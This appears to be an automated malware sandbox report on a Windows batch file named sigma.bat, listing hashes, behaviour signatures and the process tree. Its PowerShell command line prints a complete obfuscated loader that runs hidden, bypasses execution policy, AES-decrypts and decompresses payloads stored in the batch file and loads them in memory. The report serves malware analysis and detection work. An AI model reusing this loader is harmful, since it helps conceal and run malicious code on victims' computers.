Analysis

max time kernel: 15s
max time network: 17s
platform: windows7_x64
resource: win7-20241010-en
resource tags: arch:x64, arch:x86, image:win7-20241010-en, locale:en-us, os:windows7-x64, system
submitted: 09-11-2024 14:32

Static task: static1
Behavioral task: behavioral1
Sample: sigma.bat
Resource: win7-20241010-en
5 signatures
150 seconds
General

Target: sigma.bat
Size: 467KB
MD5: 820debc2f4f0c9222c455ad0befb35ca
SHA1: 2f64b6503ac7e19c37d2556c5a8096b593b152d3
SHA256: 722075c841ad49931e716a80a1ba276b325ee7eb7062e295140107ac73b4f9ec
SHA512: c713b74b0163483a53454cfdbdf6a005950d0bf1e044698c93bfeb2e9fed2866fef0c17d5b7b6573dec062b1edcdc3e3eb8574c74a0beaeb370466d1c250d744
SSDEEP: 12288:vTCh8WuzcDLPRPcIA7ewthD6ERekdWYb9ACXrjuJYD5S9J:7sBut/thDZUirA2rvD49J
Score: 8/10
Malware Config
Signatures

Command and Scripting Interpreter: PowerShell (1 TTPs, 1 IoCs)
Run Powershell and hide display window.
  pid   Process
  2156  powershell.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses (1 IoCs)
  pid   Process
  2156  powershell.exe

Suspicious use of AdjustPrivilegeToken (1 IoCs)
  description              pid   Process
  Token: SeDebugPrivilege  2156  powershell.exe

Suspicious use of WriteProcessMemory (9 IoCs)
  description                        pid   Process  procid_target
  PID 2500 wrote to memory of 1232   2500  cmd.exe  31
  PID 2500 wrote to memory of 1232   2500  cmd.exe  31
  PID 2500 wrote to memory of 1232   2500  cmd.exe  31
  PID 1232 wrote to memory of 2592   1232  net.exe  32
  PID 1232 wrote to memory of 2592   1232  net.exe  32
  PID 1232 wrote to memory of 2592   1232  net.exe  32
  PID 2500 wrote to memory of 2156   2500  cmd.exe  33
  PID 2500 wrote to memory of 2156   2500  cmd.exe  33
  PID 2500 wrote to memory of 2156   2500  cmd.exe  33
Processes

C:\Windows\system32\cmd.exe (PID: 2500)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\sigma.bat"
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\net.exe (PID: 1232)
    Command line: net file
    - Suspicious use of WriteProcessMemory

    C:\Windows\system32\net1.exe (PID: 2592)
      Command line: C:\Windows\system32\net1 file

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (PID: 2156)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('tAX32kKNIA57v2PtuvPcK8ir8QplMdCOor3YMSiLeTU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wF3c9IhrNPKw6p+lQ8lg3Q=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $KImyR=New-Object System.IO.MemoryStream(,$param_var); $RDOIU=New-Object System.IO.MemoryStream; $XQVZK=New-Object System.IO.Compression.GZipStream($KImyR, [IO.Compression.CompressionMode]::Decompress); $XQVZK.CopyTo($RDOIU); $XQVZK.Dispose(); $KImyR.Dispose(); $RDOIU.Dispose(); $RDOIU.ToArray();}function execute_function($param_var,$param2_var){ $VtPlg=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DmKAS=$VtPlg.EntryPoint; $DmKAS.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\sigma.bat';$GjSSJ=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\sigma.bat').Split([Environment]::NewLine);foreach ($Rmxqb in $GjSSJ) { if ($Rmxqb.StartsWith(':: ')) { $CZpHS=$Rmxqb.Substring(3); break; }}$payloads_var=[string[]]$CZpHS.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken